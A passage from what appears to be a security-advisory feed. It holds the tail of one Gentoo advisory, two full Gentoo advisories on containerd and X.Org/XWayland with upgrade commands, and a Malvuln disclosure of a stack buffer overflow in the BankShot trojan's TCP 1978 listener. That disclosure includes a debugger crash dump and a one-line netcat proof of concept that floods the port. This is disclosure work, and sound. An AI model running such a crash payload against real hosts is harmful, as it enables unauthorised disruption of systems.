[ 5 ] CVE-2020-36134  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36134  
[ 6 ] CVE-2020-36135  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36135  
[ 7 ] CVE-2021-30473  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30473  
[ 8 ] CVE-2021-30474  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30474  
[ 9 ] CVE-2021-30475  
      https://nvd.nist.gov/vuln/detail/CVE-2021-30475

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-32

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-32

Trojan.Win32 BankShot malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/f2fd6a7b400782bb43499e722fb62cf4.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Trojan.Win32 BankShot  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware listens on TCP port 1978 and creates a local Windows service running with SYSTEM integrity. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting ECX, EIP registers and Structured Exception Handler (SEH)  
Family: BankShot  
Type: PE32  
MD5: f2fd6a7b400782bb43499e722fb62cf4  
Vuln ID: MVID-2024-0669  
ASLR: Not Enabled  
DEP: Enabled  
SEH: Not Enabled  
CFG: Not Enabled  
Disclosure: 01/30/2024

Memory Dump:  
(16bc.cf8): Access violation - code c0000005 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> .ecxr  
eax=00000000 ebx=00000000 ecx=41414141 edx=77309d70 esi=00000000 edi=00000000  
eip=41414141 esp=061511f0 ebp=06151210 iopl=0         nv up ei pl zr na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246  
41414141 ??              ???  
0:005> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

*** WARNING: Unable to verify checksum for MouseServer.exe  
*** ERROR: Module load completed but symbols could not be loaded for MouseServer.exe  
Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

EXCEPTION_RECORD:  0624dec4 -- (.exr 0x624dec4)  
ExceptionAddress: 0042a95e (MouseServer+0x0002a95e)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000000  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 06250000  
Attempt to write to address 06250000

PROCESS_NAME:  MouseServer.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP:   
MouseServer+2a95e  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]

FAILED_INSTRUCTION_ADDRESS:   
+2a95e  
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  41414141

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  0624df14 -- (.cxr 0x624df14)  
eax=027fce88 ebx=0624fbfc ecx=000008d8 edx=00001d00 esi=027fc5b0 edi=06250000  
eip=0042a95e esp=0624e374 ebp=0624fbf0 iopl=0         nv up ei pl nz na po cy  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203  
MouseServer+0x2a95e:  
0042a95e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]  
Resetting default scope

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 41414141 to 0042a95e

FRAME_ONE_INVALID: 1

STACK_TEXT:    
0624e374 0042a95e mouseserver+0x2a95e  
0624fbf8 41414141 unknown!printable+0x0

STACK_COMMAND:  .cxr 000000000624DF14 ; kb ; dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; dds 624e374 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  mouseserver+2a95e

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: MouseServer

IMAGE_NAME:  MouseServer.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  58eb1b3a

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_MouseServer.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_mouseserver+2a95e

0:005> !exchain  
0624ddd4: ntdll!ExecuteHandler2+44 (77309d70)  
0624fbe4: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
C:\Users\gg\Desktop>python -c "print('A'*32000)" | nc64.exe x.x.x.x 1978  
system windows 6.2  
version 1.7.4.0  
serverid 7E8539FB-5E68-464F-AE62-129E95A7DFB8

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Trojan.Win32 BankShot MVID-2024-0669 Buffer Overflow

Gentoo Linux Security Advisory 202401-31 - Multiple vulnerabilities have been found in containerd, the worst of which could result in privilege escalation. Versions greater than or equal to 1.6.14 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-31  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: containerd: Multiple Vulnerabilities  
     Date: January 31, 2024  
     Bugs: #802948, #816315, #834689, #835917, #850124, #884803  
       ID: 202401-31

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in containerd, the worst of  
which could result in privilege escalation.

Background  
==========

containerd is a daemon with an API and a command line client, to manage  
containers on one machine. It uses runC to run containers according to  
the OCI specification.

Affected packages  
=================

Package                    Vulnerable    Unaffected  
-------------------------  ------------  ------------  
app-containers/containerd  < 1.6.14      >= 1.6.14

Description  
===========

Multiple vulnerabilities have been discovered in containerd. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All containerd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/containerd-1.6.14"

References  
==========

[ 1 ] CVE-2021-32760  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32760  
[ 2 ] CVE-2021-41103  
      https://nvd.nist.gov/vuln/detail/CVE-2021-41103  
[ 3 ] CVE-2022-23471  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23471  
[ 4 ] CVE-2022-23648  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23648  
[ 5 ] CVE-2022-24769  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24769  
[ 6 ] CVE-2022-31030  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31030

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-31

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-31

Gentoo Linux Security Advisory 202401-30 - Multiple vulnerabilities have been discovered in the Xorg Server and XWayland, the worst of which can result in privilege escalation or remote code execution. Versions greater than or equal to 21.1.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-30  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: X.Org X Server, XWayland: Multiple Vulnerabilities  
     Date: January 31, 2024  
     Bugs: #916254, #919803, #922395  
       ID: 202401-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in the Xorg Server and  
XWayland, the worst of which can result in privilege escalation or  
remote code execution.

Background  
==========

The X Window System is a graphical windowing system based on a  
client/server model.

Affected packages  
=================

Package               Vulnerable    Unaffected  
--------------------  ------------  ------------  
x11-base/xorg-server  < 21.1.11     >= 21.1.11  
x11-base/xwayland     < 23.2.4      >= 23.2.4

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X Server and  
XWayland. Please review the CVE identifiers referenced below for  
details.

Impact  
======

The X server can be crashed by a malicious client, or potentially be  
compromised for remote code execution in environments with X11  
forwarding.

Workaround  
==========

Users can ensure no untrusted clients can access the running X  
implementation.

Resolution  
==========

All X.Org X Server users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xorg-server-21.1.11"

All XWayland users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-base/xwayland-23.2.4"

References  
==========

[ 1 ] CVE-2023-5367  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5367  
[ 2 ] CVE-2023-5380  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5380  
[ 3 ] CVE-2023-6377  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6377  
[ 4 ] CVE-2023-6478  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6478  
[ 5 ] CVE-2023-6816  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6816  
[ 6 ] CVE-2024-0229  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0229  
[ 7 ] CVE-2024-0408  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0408  
[ 8 ] CVE-2024-0409  
      https://nvd.nist.gov/vuln/detail/CVE-2024-0409  
[ 9 ] CVE-2024-21885  
      https://nvd.nist.gov/vuln/detail/CVE-2024-21885  
[ 10 ] CVE-2024-21886  
      https://nvd.nist.gov/vuln/detail/CVE-2024-21886

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-30

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web